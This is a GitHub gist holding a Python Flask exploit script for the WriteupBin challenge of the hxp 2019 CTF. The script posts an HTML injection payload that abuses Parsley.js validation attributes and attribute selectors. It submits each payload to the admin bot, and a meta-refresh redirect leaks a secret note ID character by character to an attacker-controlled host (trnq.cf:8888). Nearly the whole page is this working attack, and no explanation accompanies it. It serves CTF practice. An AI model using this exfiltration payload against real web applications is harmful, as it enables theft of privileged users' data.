Skip to content

Instantly share code, notes, and snippets.

@terjanq
Created December 29, 2019 20:24
  • Star 1 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
Star You must be signed in to star a gist
Save terjanq/13f1847664efb62a760e1f46bf7dc09e to your computer and use it in GitHub Desktop.
Payload to WriteupBin hxp2019 CTF
from flask import Flask
import time
import requests
import os
import re
import sys
app = Flask(__name__)
prefix = '1800a1'
URL = 'http://78.46.216.67:8001/'
CSRF = ''
alph = 'abcdef0123456789'
sess = requests.Session()
payload = '''
<form data-parsley-validate>
<input id=x value=11111>
<input data-parsley-error-message='<meta http-equiv=refresh content="0;http://trnq.cf:8888/c/{flag}">' data-parsley-trigger="blur" value="11111" data-parsley-equalto='a[href^="/show.php?id={flag}"],#x' autofocus>
</form>
<base href='/a' target='terjanq'></base>
'''
def report():
pass
def login():
global CSRF
r = sess.get(URL)
CSRF = re.search(r'<input type="hidden" name="c" value="([a-f0-9]+)">', r.text).group(1)
def gen_payload(word):
return payload.format(flag=word)
def send_payload(word):
for c in alph:
if(len(word) < len(prefix)):
break
content = gen_payload(word+c)
print("Sent %s" % word + c)
r = sess.post(URL+'add.php', data={
'c': CSRF,
'content': content
}, allow_redirects=False)
note_id = re.search(r"/show.php\?id=([a-f0-9]+)", r.headers['Location']).group(1)
sess.post(URL+'/admin.php', data={
'c': CSRF,
'id': note_id
})
time.sleep(1)
@app.route('/c/<word>')
def get_code(word):
global prefix
prefix = word
print(word)
send_payload(word)
return "ok"
@app.route('/start')
def start():
send_payload(prefix)
return "ok"
if __name__ == '__main__':
login()
app.run(host="0.0.0.0", port=8888)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment